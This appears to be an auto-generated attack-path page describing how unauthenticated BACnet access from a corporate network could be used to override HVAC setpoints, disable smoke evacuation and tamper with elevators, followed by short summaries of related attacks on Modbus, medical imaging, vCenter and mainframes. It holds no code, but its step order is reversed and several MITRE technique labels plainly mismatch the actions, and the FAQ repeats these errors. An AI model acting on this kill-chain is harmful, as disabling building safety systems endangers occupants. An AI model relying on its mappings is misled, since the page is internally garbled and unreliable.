BACnet HVAC → disrupt building operations
BACnet on UDP/47808 is unauthenticated. From a foothold in corporate IT, write to HVAC controllers — over-cool a data centre, disable smoke evacuation, mess with elevators.
§ Context
Assumed environment: target's BMS (Building Management System) shares network with corporate IT (extremely common). BACnet on the building-automation subnet allows WriteProperty without auth.
§ Steps
- 01Disrupt HVAC / elevators / smoke evacImpactT1486— Data Encrypted for Impact
- 02BACnet WhoIs / I-Am enumerationDiscoveryT1087— Account Discovery
- 03Scan UDP/47808 across building VLANDiscoveryN-NMAP-INTERNAL— Internal Nmap Sweep
- 04WriteProperty to setpoints / overridesImpactOT-BACNET— BACnet Building Automation Write
- 05ReadProperty across controllersCredential AccessT1040— Network Sniffing
§ References
- T1486Data Encrypted for Impact
- T1087Account Discovery
- T1040Network Sniffing
§ Frequently asked
- What is the "BACnet HVAC → disrupt building operations" attack path?
- BACnet on UDP/47808 is unauthenticated. From a foothold in corporate IT, write to HVAC controllers — over-cool a data centre, disable smoke evacuation, mess with elevators. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Disrupt HVAC / elevators / smoke evac (T1486) — a impact primitive. Assumed environment: target's BMS (Building Management System) shares network with corporate IT (extremely common).
- What is the final impact of this kill-chain?
- The final step lands on ReadProperty across controllers (T1040), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques4
Reachable Modbus PLC → direct register override
Modbus has no authentication. From a foothold on a reachable OT network, write to coils / holding registers directly with pymodbus.
- Shared techniques2
Stolen credentials → no-MFA Snowflake → mass tenant exfil (2024)
Infostealer logs from third-party machines yielded credentials for many Snowflake tenants. Tenants without enforced MFA / IP allow-lists were directly queried; dozens of customer data sets exfiltrated.
- Shared techniques2
Unauth DICOM PACS → mass medical-image exfil
PACS server accepts unauthenticated C-FIND / C-MOVE on port 104 / 11112. Query for every study, pull every image — exfil hundreds of thousands of patient scans + DICOM metadata (PII).
- Shared techniques2
LoRaWAN replay → spoof environmental sensor
Capture LoRaWAN uplinks from a target sensor. Devices that reset FCnt on reboot accept replayed frames — feed false readings into the upstream IoT platform.
- Shared techniques2
z/OS TN3270 → RACF userID brute → mainframe shell
Internet-/intranet-exposed TN3270 mainframe terminal. Userids follow predictable HR scheme. Brute-force passwords; many environments allow short / dictionary passwords for legacy reasons.
- Shared techniques2
vCenter pre-auth RCE → root on every ESXi → mass encrypt
Pre-auth RCE on vCenter Server (DCERPC or vSphere Client class CVE). Deploy SSH key via vCenter to every managed ESXi, then mass-encrypt every .vmdk — the ESXiArgs / Black Basta playbook.